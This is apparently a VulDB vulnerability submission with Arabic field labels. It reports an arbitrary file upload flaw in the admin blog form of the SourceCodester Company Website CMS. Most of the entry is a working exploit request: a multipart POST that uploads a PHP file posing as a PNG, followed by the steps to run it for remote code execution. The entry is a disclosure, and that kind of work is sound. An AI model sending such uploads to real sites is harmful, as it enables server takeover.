| عنوان | Company website CMS------backend blog management RCE |
|---|
| الوصف | info:There is an arbitrary file upload vulnerability in the company's website CMS background add-blog
Add a blog in the background, upload attachments, capture packets, and modify the attachment suffix to php as needed.
Modify the content of the attachment to realize RCE by php code getshell.
Then traverse the URL:/dashboard/uploads/blog/xxxxx.php access
payload:
POST /dashboard/add-blog.php HTTP/1.1
Host: 192.168.153.1:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------2960604280433651870831976
Content-Length: 674
Origin: http://192.168.153.1:8090
Connection: close
Referer: http://192.168.153.1:8090/dashboard/add-blog.php
Cookie: PHPSESSID=0n5rjh4b6tqupjl95toh92f4jb
Upgrade-Insecure-Requests: 1
-----------------------------2960604280433651870831976
Content-Disposition: form-data; name="blog_title"
t1
-----------------------------2960604280433651870831976
Content-Disposition: form-data; name="blog_desc"
t2
-----------------------------2960604280433651870831976
Content-Disposition: form-data; name="blog_detail"
t3
-----------------------------2960604280433651870831976
Content-Disposition: form-data; name="ufile"; filename="123.php"
Content-Type: image/png
<?php phpinfo();?>
-----------------------------2960604280433651870831976
Content-Disposition: form-data; name="save"
-----------------------------2960604280433651870831976-- |
|---|
| المصدر | ⚠️ https:// www.sourcecodester.com/php/15517/company-website-cms-php.html |
|---|
| المستخدم | jsbae3449 (UID 30775) |
|---|
| ارسال | 09/08/2022 04:54 PM (4 سنوات منذ) |
|---|
| الاعتدال | 09/08/2022 06:54 PM (2 hours later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 205882 [SourceCodester Company Website CMS Add Blog /dashboard/add-blog.php ufile تجاوز الصلاحيات] |
|---|
| النقاط | 20 |
|---|